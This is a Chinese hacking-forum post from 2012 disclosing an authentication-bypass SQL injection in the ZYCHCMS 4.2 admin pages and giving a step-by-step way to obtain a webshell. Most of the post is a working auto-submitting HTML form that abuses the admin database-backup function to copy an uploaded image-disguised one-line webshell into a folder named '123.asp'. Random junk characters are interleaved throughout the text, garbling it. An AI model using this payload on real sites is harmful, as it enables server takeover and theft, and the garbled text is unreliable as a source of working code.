找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1812|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
6 a5 u$ L, j8 T+ |# [+ Y4 o; P
8 H2 r, D4 d' o$ s) d8 r* }9 ]2 s  s. |
: b( q% R; `4 _0 b7 h& A8 D  e% N

4 a, |/ H) K5 _, X. T影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)# x. x) x  T0 w
①SQL注射漏洞
& }. n" P0 Q* E 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp0 m$ G  t* v1 s
漏洞原因:未过滤
% c$ U* b# {" p- W* c1 b 漏洞代码:- b2 p: z& b1 |( o, S3 F
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。, `: A1 D2 h$ r7 }; a" F6 m
修复方法:在文件开头加入代码
4 N3 z* M, @8 f8 h  l# E9 {
) w" J& R5 K! F3 V# G/ H' J: M9 S. E* \+ j% q
②后台拿WBSHELL
' s6 X$ q2 q$ c" S 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 L# i7 {- C' y; g; z' e 这里在网上找了一个,改了下,将就着用。5 b1 w7 O1 v3 Q2 k4 N4 w
以下是代码本地提交代码2 _$ K8 v. S( _) I  h+ L* R" c
0 n3 X$ |" c0 x* a. e1 r  }

. ~! s: `. j7 r9 t9 I<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ u- l" O% W" |
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
4 a. K4 g" s4 S9 g$ w) ^( m <tr>" z% A2 |" M  T- H8 H
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
6 E) |! k$ S6 V7 `- D </tr>
2 r# ^. @1 r4 f% x <tr>
, D* c1 \& j( v9 z3 a* k; f; b" Y <td bgcolor=”#FFFFFF”><span class=”back_southidc”>" \2 T# C9 W9 M
</span>
& Z" V/ ~) H, o) @$ p4 e3 v <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >5 Y8 o0 M, @; {0 c; c' f6 b
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >  _, K. |# _. K. O
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
* U/ t* N+ X( x <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d+ e" S  ]( n1 L+ k  x/ O& P+ E
<div align=”left”>
. v: e7 K$ G' z8 w$ q/ Z <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
  a8 I6 t/ @9 N' [0 `* L <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
( A& i5 w2 V! w) \& @% a* T <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
1 H  {4 @2 N! F0 d8 T3 `1 S$ |8 e2 U </div></td>
: L* B( F8 Q1 m% H: X </tr>
- k1 C1 [( ]4 f; S/ Y5 I7 Y2 K! Q6 T <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>  ?9 {; J' }# P, _; V
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
( B9 `# p! |$ Z' @8 i <td class=”td”><div align=”left”># d2 b* J! {. L/ |; H
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />% @' L1 [; S2 Z8 N; N
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>$ z* C( a' F1 f( M# b
</tr>
( C& y4 u$ o8 s1 T7 K; ` <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>, x7 y2 \. Y: M8 w$ w# C  K3 h
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
* @9 {; M! v0 v) ^9 z) ~& L9 G <td class=”td”><div align=”left”>1 {: F7 r3 P  \% I& ?' G
<input type=”submit” value=”确定备份” class=”btn”
' G8 N. Z7 V) W9 n% L& p* o </div></td>
3 D5 E$ B; ?+ d6 q' d; B </tr>: K: k! e8 j. j5 H! K
</table></td></tr></form>9 U5 C; }6 m* `; g0 G% G6 j
</table>
' s9 i2 v# p5 L! R* }1 \' E" z6 H* _ </td>9 g- {, U! B: I
</tr>) w' C: G( Q9 ?7 |4 g1 r
</table>, O. V1 j  F+ ?5 [1 m+ m
<script>- d( d  C+ d) T  _
document.all.add.submit();% c4 }& S" C7 G1 ^9 K/ a- K" y1 h
</script>6 y0 b" |& {- b9 g
+ n" y& A9 y% v" l

5 R/ U8 h1 k1 m) X1 G. t( v4 L5 R
0 P' X7 S% ^0 y3 M% e% ]' h$ l" @3 z8 l& v. K$ u6 g

: w+ `% u) c: _; B& O
7 Y! J+ e" N; [9 ^: I, G& A5 I" v  e
6 {+ A) ~# L& w8 w) g2 F" [) K
1 L; z  [" i2 {5 x
3 q( |2 \  M$ {5 [/ f& F0 R6 V  {2 k0 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表